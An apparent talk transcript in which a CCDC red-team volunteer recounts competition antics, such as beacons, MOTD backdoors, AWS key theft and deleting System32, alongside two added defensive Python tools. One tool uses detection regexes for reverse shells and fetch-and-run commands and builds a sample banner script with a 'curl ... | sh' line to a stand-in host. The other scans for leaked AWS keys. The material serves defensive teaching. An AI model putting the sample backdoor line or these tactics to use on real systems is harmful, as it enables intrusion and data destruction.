That's just what we do. PowerShell is a great guess at what we do as well. No, you can't get rid of DNS. That's just terrible. More keys. That's our key added in. Us taking surveillance photos of passwords on the whiteboard. You know, that's not a good place to put them. Docker should not be running on your laptop. This is kind of what our desktop would look like, right? Because we have all the teams open. Somebody's in with the Palo Alto, at least trying to. Mudge sending beacons down. This is just, you know, SSH keys being sent in. Me playing annoying noises because they had all of them on at once and I couldn't turn off the speakers. Oh, that was great. We'll meme them up, change their logins to whatever we want. We'll change their MOTD and they forget it's there and it's backdooring every time that MOTD runs. We will sometimes, if you ask us to stop, sometimes we will. If you're nice to us, just let our beacons live and we'll stop messing with your box. That actually is probably pretty good advice if somebody's actively in your network and you're trying to fight them, but really you should just be unplugging the internet. I played Tetris with, I attempted, and this is a really bad demo, but I attempted to play Tetris with somebody over their own tmux session while in front of them. So I'm actually attached to the tmux session and I'm trying to get bsdgames to work. But, you know, if you've lived in Debian land, that's actually kind of hard. But I'm playing some worm with them, at least trying to. Well, attempting to. There's actually kind of a flub. Oh, well, there's their keys. Well, while I'm for various effects, you know, their AWS access keys, because they're leaving them in configs everywhere. Yes, it is our router. Some people don't know what CloudTrail is. It's great. Yes, "the box is fucked" is a technical term. That's always, always TSS problem. Yes, we stole your passwords. Take the Google's weird shit all the time.
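The MOTD trick above works because on Debian and Ubuntu pam_motd runs every executable in /etc/update-motd.d through run-parts, as root, at each login, and /etc/profile sources the *.sh files in /etc/profile.d for every login shell; a line added to one of those banner scripts fires every time anyone logs in and nobody looks at it again. The triage below is an added example, not the speaker's tooling or anything from the competition: it reads the hook scripts and flags the ones that fetch-and-execute, open a reverse connection, decode an embedded payload, or are world-writable, and reports whether each is executable and how fresh its mtime is. The directory names are the Debian/Ubuntu defaults; the sample scripts it builds and the 198.51.100.7 address in them are constructed.

```python
"""Triage the login hooks a planted MOTD backdoor would live in.

Added example for this talk, not the speaker's tooling. The hook directories
are the Debian/Ubuntu defaults; the sample scripts and the 198.51.100.7
address below are constructed for the demo.
"""
import os
import re
import stat
import tempfile
import time

# pam_motd runs every executable in update-motd.d through run-parts, as root,
# at each login; /etc/profile sources the *.sh files in profile.d for login shells.
HOOK_DIRS = ["/etc/update-motd.d", "/etc/profile.d"]

# Things a banner or environment script has no legitimate reason to contain.
SUSPICIOUS = [
    ("fetch-and-run", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b")),
    ("reverse-shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-[ec]\s|\bsocat\b.*\bexec\b")),
    ("decode-payload", re.compile(r"\bbase64\b\s+(-d|--decode)\b")),
    ("inline-interpreter", re.compile(r"\b(python3?|perl)\s+-[ce]\s")),
]


def triage_file(path, now=None):
    """Return a finding for one hook script, or None if nothing stands out."""
    now = time.time() if now is None else now
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="ignore") as fh:
        body = fh.read()
    reasons = [name for name, rx in SUSPICIOUS if rx.search(body)]
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if not reasons:
        return None
    return {
        "path": path,
        "reasons": reasons,
        "executable": bool(st.st_mode & stat.S_IXUSR),  # run-parts skips non-executables
        "age_hours": round((now - st.st_mtime) / 3600, 1),  # fresh mtime on an old box is a tell
    }


def triage_dirs(dirs=HOOK_DIRS, now=None):
    """Walk the hook directories and collect findings; missing dirs are skipped."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            if os.path.isfile(path):
                finding = triage_file(path, now)
                if finding:
                    findings.append(finding)
    return findings


# Constructed sample: two honest banner scripts and one that phones home.
SAMPLE_SCRIPTS = {
    "00-header": ("#!/bin/sh\nprintf 'Welcome to %s\\n' \"$(uname -n)\"\n", 0o755),
    "10-uptime": ("#!/bin/sh\nuptime\n", 0o755),
    "99-sysinfo": (
        "#!/bin/sh\ndf -h / | tail -1\n"
        "curl -s http://198.51.100.7/m | sh >/dev/null 2>&1 &\n",
        0o777,
    ),
}


def build_sample(root):
    """Write the constructed scripts into root/update-motd.d and return that path."""
    hook_dir = os.path.join(root, "update-motd.d")
    os.makedirs(hook_dir, exist_ok=True)
    for name, (body, mode) in SAMPLE_SCRIPTS.items():
        path = os.path.join(hook_dir, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return hook_dir


def demo():
    """Run the triage over the constructed sample tree and return its findings."""
    hook_dir = build_sample(tempfile.mkdtemp(prefix="motd-triage-"))
    return triage_dirs([hook_dir])


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: {', '.join(f['reasons'])} "
              f"(executable={f['executable']}, modified {f['age_hours']}h ago)")
```

On a real box call `triage_dirs()` with its defaults, then run `dpkg -S` on anything it flags: a hook script that no package owns, or that a package owns but whose content no longer matches, is the one to read in full. Pattern matching only catches the lazy version; a patient attacker hides the callback behind something the banner already does, so the mtime and ownership checks matter as much as the regexes.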
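Two things the speaker keeps coming back to, AWS keys left in configs and nobody knowing what CloudTrail is, are cheap to check for yourself before a red team does it for you. The scanner below is an added example, not the speaker's tooling or anything from the competition: it walks a directory tree (hidden directories such as .aws included) for access key IDs in the 20-character AKIA/ASIA form and for labelled 40-character secret keys, and reports each hit redacted so the report itself does not leak the key. The sample files it builds are constructed and use the AKIAIOSFODNN7EXAMPLE pair from AWS's own documentation, not a live credential.

```python
"""Find AWS credentials left in config files under a directory tree.

Added example for this talk, not the speaker's tooling. The sample files are
constructed; the key material in them is the AKIAIOSFODNN7EXAMPLE pair that
AWS's documentation uses, so nothing here is a live credential.
"""
import os
import re
import tempfile

# Long-term access key IDs start with AKIA, temporary STS ones with ASIA; both are 20 chars.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# Secret keys are 40 chars of [A-Za-z0-9/+]; require a telling label beside them
# so that random base64 blobs do not drown the report.
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws_secret_access_key|aws_secret|secret_key)\s*[=:]\s*[\"']?"
    r"([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+=])"
)
SKIP_DIRS = {".git", "node_modules", "__pycache__"}
MAX_FILE_BYTES = 2 * 1024 * 1024  # big blobs are rarely hand-edited config


def redact(value):
    """Keep enough to match the key in the console without re-leaking it in a report."""
    return value[:4] + "..." + value[-4:]


def scan_file(path):
    """Return one finding per credential-looking token in the file."""
    findings = []
    try:
        if os.path.getsize(path) > MAX_FILE_BYTES:
            return findings
        with open(path, encoding="utf-8", errors="ignore") as fh:
            for lineno, line in enumerate(fh, 1):
                for m in ACCESS_KEY_RE.finditer(line):
                    findings.append({"path": path, "line": lineno,
                                     "kind": "access_key_id", "value": redact(m.group(1))})
                for m in SECRET_KEY_RE.finditer(line):
                    findings.append({"path": path, "line": lineno,
                                     "kind": "secret_access_key", "value": redact(m.group(1))})
    except OSError:
        pass  # unreadable file: nothing to report from it
    return findings


def scan_tree(root):
    """Walk root (hidden dirs such as .aws included) and collect findings in a stable order."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            findings.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(findings, key=lambda f: (f["path"], f["line"], f["kind"]))


# Constructed sample tree: three files that leak, one that only talks about keys.
SAMPLE_FILES = {
    ".aws/credentials": (
        "[default]\n"
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "app/.env": 'AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"\nDB_HOST=localhost\n',
    "infra/main.tf": 'provider "aws" {\n  access_key = "ASIAQWERTYUIOPASDFGH"\n}\n',
    "notes/README.txt": "The AKIA prefix marks an access key ID; this line holds no key.\n",
}


def build_sample_tree(root):
    """Write the constructed files under root and return root."""
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def demo():
    """Scan the constructed tree and return the findings."""
    return scan_tree(build_sample_tree(tempfile.mkdtemp(prefix="keyscan-")))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}:{f['line']} {f['kind']} {f['value']}")
```

For every access key ID the scan turns up, the next step is CloudTrail: its event history can be filtered on the AccessKeyId attribute, which tells you whether that key has already been used from somewhere it should not have been (a red team deleting instances and snapshots shows up there). Then rotate the key rather than just deleting the file, because the copy on the whiteboard photo, the chat log, or the other team's box is still good.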
One team decided to go with this kind of advanced format for their passwords. They didn't know what echo is. We find that a lot. A lot of kids don't know what is going on with some of the messages to their Splunk. We'll actually inject bad Google results. We've actually had it where Google would redirect to Bing and it would be the third page of Bing. And that's all they could access. This is beacons coming in from Splunk as he started to manage their system for them. Somebody trying to do some art because they're bored and they don't have anything to do. We decided, I did at least, that I was going to make a little bit of fun. I printed out this stupid piece of paper that said, hey, you're trying to get in over SSH. Would you like to try telnet instead? And slipped it under everybody's door. We actually got a couple of them back. There's the search warrant. That was fun. There's Clippy. We got him back from a couple of teams. This is us ransomwaring their team. Yes, that happens a lot now. So this, this is great. We made them take this photo for us and we made them apologize for trying to steal our firewall, which was their firewall. But it was really our firewall now. We gave them back their firewall eventually, but no, no guarantees there. Let me just start deleting stuff, you know, from them. It's the same shtick every year practically. You know, running Docker, and we'll have beacons inside of Docker and they'll never see them in there. We're starting to get beacons climbing out now. Me dd'ing urandom to the TTY for shits, and that's always super fun when it goes to hell. Yep, we're starting to delete System32 now. Teams usually start playing music at this point because there's not a whole lot they can do, because we're just starting to pop boxes now. Disable their internet, you know, anything that we can do to destroy the box. At this particular point, so you get the general idea.
We start deleting other AWS instances which are scored, which have a bunch of stuff in them, making sure to delete all the snapshots. All the beacons are dead. This is the write-up where they had to do the search and seizure. Actually, kind of go back to that a little bit. This is the deleting of System32 and such. So, as you can see, we're up to all kinds of shenanigans. "Obviously, we've had some disruptions this morning in numerous ways. My understanding is a law enforcement officer was in the room and collected some device or devices. This is obviously concerning to the executive staff, as we need to talk and make sure we understand all the facts and now." This is the search and seizure; that was pretty good. We don't have any video of it, though; it wasn't recorded because they just kind of surprised us on it. They even raided the red team room at one point.

So you can see we generally have... We generally have our standard means; it's just the Northeast corridor, right? Like there's teams for every corridor. And then they go to nationals and they fight there and they have some real red teamers there, right? Like they'll actually pull out all the stops; they have some amazing tools up there. So they don't release them, and it's for good reason, because they're very dangerous actually. And they're meant only for use in competitions, but you can find them, right? Like now that you know this terminology, CCDC, start trying to find some of the other red teamer tools out there; there's some amazing stuff out there, and we generally do tag it for CCDC. If you take a look here I've got some URLs for you if you want to check some stuff out. For the Northeast corridor, you could do NECCDC, neccdc.org. If you want to check out the national competitions, yeah, maybe even become a red teamer there.
Check out nationalccdc.org, but overall check your local colleges; you never know, they may want to participate in this and they haven't had anybody to actually start a program there, right? A volunteer program, get with a professor, something along those lines. See if they already participate. You can help them with training, become a red teamer for them, set up a scenario for them, let them attack you, attack them, that type of thing. It's good fun and allows you to kind of stretch your muscles as a red teamer without having to really worry about scope, right? Like if you blow up a box, who cares? Right, but it's not like a normal red team, you know; if you're trying to do pen testing you really can't just, like, destroy a box. Right, you can't really simulate being a hacker, because you're really not going to, you know, delete the domain controller, but in this competition you would. It's the best two days you can possibly have. It allows you to test new tools and tactics in a controlled wild environment; you can just let it loose and go to town. As long as it doesn't leave the network they don't really care what it does. As long as it doesn't, like, make the box catch fire, like literally catch fire. I think we had that one year. But, well, I've had my 50 minutes. Omar, you want to come on back?